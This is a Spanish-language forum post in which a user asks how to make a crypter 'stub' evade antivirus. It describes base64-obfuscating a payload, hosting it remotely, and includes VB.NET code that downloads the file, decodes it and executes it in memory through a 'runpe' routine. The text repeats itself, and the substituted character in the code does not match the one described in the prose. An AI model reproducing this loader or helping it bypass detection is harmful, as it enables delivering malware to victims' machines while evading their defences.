Stub 100% Fud|pero detectado cuando ejecuta los bytes
Publicado: 12 Oct 2012, 12:05
Hola,
Tengo un gran problema :
1- tengo el constructor para leer los bytes y cifrar con base64 y guardar los datos cifrados en un archivo y reemplazar la "A" con "U"
2- subo el archivo a un servicio de hosting
3- eso es el codigo del stub :
El stub comproba si el archivo cifrado se encuentra en la carpeta si no se descarga desde el servicio de hosting, entonces lo lee y guarda los datos en una variable aquí "lol", entonces sustituir a la "U" con "A" y la convierten en bytes y se ejecuta con una runpe fud!
El problema que tenemos aquí es que aunque el stub es 100% Fud se detecta cuando el stub quiere ejecutar los datos con el runpe el antivirus lo detectará :/
Por favor, alguien me puede ayudar a evitar la detección :'( ?!
Gracias !
lo siento mi espanol es un poco debil !!
Tengo un gran problema :
1- tengo el constructor para leer los bytes y cifrar con base64 y guardar los datos cifrados en un archivo y reemplazar la "A" con "U"
2- subo el archivo a un servicio de hosting
3- eso es el codigo del stub :
Código: Seleccionar todo
Dim instance As WebClient = New WebClient
Dim lol As String
If File.Exists(Application.StartupPath & "\file") = False Then
instance.DownloadFile("http://www.webhost.com/file", Application.StartupPath & "\file")
End If
lol = IO.File.ReadAllText(Application.StartupPath & "\file")
Call run.runpe(Convert.FromBase64String(lol.Replace("ù", "A")), Process.GetCurrentProcess.MainModule.FileName)
El problema que tenemos aquí es que aunque el stub es 100% Fud se detecta cuando el stub quiere ejecutar los datos con el runpe el antivirus lo detectará :/
Por favor, alguien me puede ayudar a evitar la detección :'( ?!
Gracias !
lo siento mi espanol es un poco debil !!